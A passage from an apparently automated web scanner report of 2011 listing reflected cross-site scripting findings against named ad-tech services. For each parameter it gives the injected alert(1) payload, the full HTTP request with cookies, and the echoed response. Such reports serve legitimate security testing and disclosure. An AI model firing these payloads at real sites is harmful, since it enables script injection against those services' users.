!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:28 GMT
Pragma: no-cache
Content-Length: 4644
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8f2c2"-alert(1)-"6ceae886f18=1&Z=468x60&s=1384085&_salt=140315222";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admatch-syndication.mochila.com
Path:   /viewer/channel/badgex

Issue detail

The value of the buyerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a45a3</script><script>alert(1)</script>90304e5e524 was submitted in the buyerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /viewer/channel/badgex?&asHtml=true&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&destination=1596&channelId=13429&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=www.orlandosentinel.com&mcmp=all_ibd_tout_widget HTTP/1.1
Host: admatch-syndication.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:48 GMT
Server: VoxCAST
Last-Modified: Mon, 09 May 2011 14:02:48 GMT
Cache-Control: max-age=1200
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
X-Cache: MISS from VoxCAST
Set-Cookie: JSESSIONID=1529D62A75546E533E45404DDEDC6525; Path=/
Content-Length: 9924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<style type="text/css" media="screen">
body{

...[SNIP]...
<img id="mochilaTrack" src="http://admatch-syndication.mochila.com/images/ad.gif?mtyp=tout&buyerId=OrlandoSentinela45a3</script><script>alert(1)</script>90304e5e524&channelId=13429&mcmp=IBDTout&mche=', Math.random(), '" />
...[SNIP]...

3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2252b'-alert(1)-'d4dfa0675de was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:46 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=1932252b'-alert(1)-'d4dfa0675de&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b40'-alert(1)-'bf51ba85aa was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:51 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/matchc3b40'-alert(1)-'bf51ba85aa?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20009<script>alert(1)</script>eac34010d7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 09 May 2011 14:00:52 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720009<script>alert(1)</script>eac34010d7b

3.30. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload acdc2<script>alert(1)</script>2478b25a1c1 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1&n=ar_int_p97174789&1304949596809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:58 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionacdc2<script>alert(1)</script>2478b25a1c1("");

3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload df383<script>alert(1)</script>19276a1a2c0 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7df383<script>alert(1)</script>19276a1a2c0&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:46 GMT
Date: Mon, 09 May 2011 14:00:46 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7df383<script>alert(1)</script>19276a1a2c0", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload a74ed<script>alert(1)</script>5f0e5f320d7 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=a74ed<script>alert(1)</script>5f0e5f320d7&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"a74ed<script>alert(1)</script>5f0e5f320d7", c16:"", r:""});



3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ee3b1<script>alert(1)</script>a730d899c17 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888ee3b1<script>alert(1)</script>a730d899c17&c3=2&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
